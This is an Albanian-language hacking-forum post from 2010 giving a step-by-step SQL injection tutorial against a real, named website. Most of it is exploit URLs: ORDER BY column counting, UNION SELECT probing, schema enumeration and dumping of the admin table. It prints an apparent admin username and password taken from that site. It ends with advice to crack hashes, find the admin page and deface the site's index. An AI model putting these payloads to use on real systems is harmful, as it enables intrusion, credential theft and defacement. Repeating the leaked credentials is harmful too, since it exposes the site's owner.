CHG-CREW
Would you like to react to this message? Create an account in a few clicks or log in to continue.

CHG-CREW

Computer Hack Generation
 
ForumKërkoLatest imagesRegjistrohuidentifikimi

 

 Tutorial Sql Edhe Me Shembll

Shko poshtë 
AutoriMesazh
N3TWORM

N3TWORM


Numri i postimeve : 26
Join date : 22/10/2010

Tutorial Sql Edhe Me Shembll Empty
MesazhTitulli: Tutorial Sql Edhe Me Shembll   Tutorial Sql Edhe Me Shembll I_icon_minitimeSun Oct 24, 2010 11:24 am

Ne kete tutorial do ju tregoj se si te hackoni website me SQL injection kur kemi te bejme me SQL version 5.x.x

1.Ne fillim kerkojme ne google me dorkun e lartshenuar...
shenim: nga ky dork un zgjodha kete sit: http://www.leadacidbatteryinfo.org/newsdetail.php?id=44



veprimet i keni te shpjeguara ktu tek text dokumenti dhe un do ti bej ne praktike Wink

2.zgjedhim nje sit dhe per te testuar a eshte vulnerable i shtojme nje ' ...nqs del ndonje
mesazh i ngjashem me "SQL syntax error..." atehere webi eshte vulnerable dhe mund
ta hackojme...

3.tani duhet te gjejme nr e columnsave...heqim ' dhe shkruajme order by dhe i provojm
columnsat derisa na del error...
shembull: http://www.leadacidbatteryinfo.org/newsdetail.php?id=44 order by 1-- hapet faqja normal



http://www.leadacidbatteryinfo.org/newsdetail.php?id=44 order by 5-- hapet faqja normal



http://www.leadacidbatteryinfo.org/newsdetail.php?id=44 order by 10-- hapet faqja normal



http://www.leadacidbatteryinfo.org/newsdetail.php?id=44 order by 11-- hapet faqja normal



http://www.leadacidbatteryinfo.org/newsdetail.php?id=44 order by 12-- na jep error
kjo do te thote qe columni 12 nuk ekziston ,pra kemi 11 columnsa...

4.tani duhet te gjejm columnat vulnerable...per ta gjetur ,shkruajme union select edhe i
shkruajme njeri pas tjetrit te gjithe columnsat...columni ose columnsat qe dalin ,jane
vulnerable dhe ne mund te kryejme injeksionin tek secili prej tyre...shtojme nje - pas id= pasi duhet ta barazojme me zero dhe nga 44 ,per ta barazuar me zero shkruajme -44
shembull: http://www.leadacidbatteryinfo.org/newsdetail.php?id=-44 union select 1,2,3,4,5,6,7,8,9,10,11--
na dolen si columna vulnerable: 3,4,5,8,9...ne mund ta kryejme injeksionin tek secili prej ketyre pa problem
un po zgjedh 8...

5.per te gjetur versionin e SQL shkruajme tek nje column vulnerable "@@version"...nqs na del
version 5.x.x do te thote qe eshte e lehte per tu hackuar...nqs komanda e siperme na jep nje error ,atehere aty provojme te shkruajme "convert(@@version using latin1)" nqs edhe kjo nxjerr error ,atehere shkruajme "unhex(hex(@@version))"
shembull: http://www.leadacidbatteryinfo.org/newsdetail.php?id=-44 union select 1,2,3,4,5,6,7,@@verion,9,10,11--
nuk nxjerr error...na doli version 5.0.77 qe do te thote se hackohet lehte...

6.duhet te gjejme emrat e tabelave...per ta bere kete shkruajme tek column vulnerable
"group_concat(table_name)" dhe pas columnit te fundit shkruajme
"from information_schema.tables where table_schema=database()" - ne po kerkojem per nje table qe e ka emrin e ngjashem me: tbl_user, tbl_admin, tbl_access, user, users, member, members, admin, admins, customer,customers, orders, phpbb_users, phpbb_admins etjjj...
shembull: http://www.leadacidbatteryinfo.org/newsdetail.php?id=-44 union select 1,2,3,4,5,6,7,group_concat(table_name),9,10,11 from information_schema.tables where table_schema=database()--
gjetem si table name - tbladmin

7.per te gjetur emrat e columnave shkruajm te column vulnerable "group_concat(column_name)" dhe pas columnit te fundit shkruajme "from information_schema.columns where table_name=0x........" (tek pikat shkruajme emrin e tabeles te convertuar ne hex)...mund ta convertoni ate ne hex ne kete faqe: http://www.swingnote.com/tools/texttohex.php
shembull: http://www.leadacidbatteryinfo.org/newsdetail.php?id=-44 union select 1,2,3,4,5,6,7,group_concat(column_name),9,10,11 from information_schema.columns where table_name=0x74626c61646d696e--

8.tani per te gjetur username dhe password shkruajme kete tek columni vulnerable "group_concat(username,0x3a,password)" dhe pas columnit te fundit shkruajme "from emri i tabeles" pra ne kete rast "from tbladmin"
shembull: http://www.leadacidbatteryinfo.org/newsdetail.php?id=-44 union select 1,2,3,4,5,6,7,group_concat(username,0x3a,password),9,10,11 from tbladmin--
na doli kjo - ishir:ishir123 qe do te thote qe --->
username: ishir
password: ishir123
ne shumicen e rasteve passwordet dalin shume te gjata...kjo ndodh pasi ato jane te encryptuar dhe duhet te decryptohen...
per ti decryptuar ,mund te perdorni ndonje program por une ju sugjeroj te perdorni decryptues online...nqs decryptusi online nuk arrin ta decryptoje passordin ,atehere une ju sugjeroj te perdorni nje program - "john the ripper"
decryptues online: http://www.md5decrypter.co.uk/
programi decryptues:http://www.openwall.com/john/h/john171w.zip
9.tani na duhet thjesht te gjejm faqen e adminit dhe te logohemi si administrator...
per te gjetur admin page shkarkoni progrmi poshte:
http://uploading.com/files/KCDVDDST/adminfinder.rar.html
pasi e gjen faqe e administratorit ,i heq indexin qe ka faqja edhe i fut nje index hacked...
Mbrapsht në krye Shko poshtë
 
Tutorial Sql Edhe Me Shembll
Mbrapsht në krye 
Faqja 1 e 1
 Similar topics
-
» Tutorial Linux
» Istaler 6.0 Tutorial forms 2

Drejtat e ktij Forumit:Ju nuk mund ti përgjigjeni temave të këtij forumi
CHG-CREW :: HACKING :: Sql Injection-
Kërce tek: